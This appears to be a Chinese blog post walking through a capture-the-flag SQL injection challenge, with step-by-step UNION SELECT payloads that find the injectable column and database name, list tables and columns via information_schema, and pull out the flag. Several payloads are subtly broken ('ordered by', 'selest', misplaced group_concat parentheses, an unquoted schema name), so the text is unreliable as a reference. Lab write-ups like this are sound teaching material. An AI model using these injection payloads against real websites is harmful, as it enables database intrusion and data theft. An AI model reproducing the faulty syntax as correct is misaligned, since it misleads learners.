本文详细介绍了如何通过判断数字注入和字符注入来识别安全漏洞,包括观察抓包、避开关键词过滤,逐步确定库名、注入位置,进而联合搜索表名和列名,最终实现数据获取的过程。
解题步骤(无过滤)
判断是数字注入还是字符注入?a=1 回显,?a=1’ 报错则为字符注入反之为数字注入
通过抓包看有无关键词过滤(有的时候过滤了也有回显)常见的有空格过滤,关键单词过滤,逗号过滤,单引号过滤,and过滤(相关具体内容,博主近期会专门出一期来讲各种过滤的绕过方法)
查看有几个库名ordered by 数字(猜测有几个库)
确定注入位置 ?a=-1’ and 1 union select 1,2,3# ---->2
确定注入库名?a=-1’ and 1 union select 1,database(),3# --->web
开始联合搜索表名?a=-1’ and 1 union select 1,select group_concat (table_name from information_schema.tables) where table_schema=web,3#--->flag,next
进一步搜索列名?a=-1 and 1 union select 1,select group_concat (column_name from information_schema.columns) where table_schema=’web’ and table_name=‘flag’,3# -->flag
直接调用 a=-1’ and 1 union select 1,selest flag from flag ,3# 获取flag
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
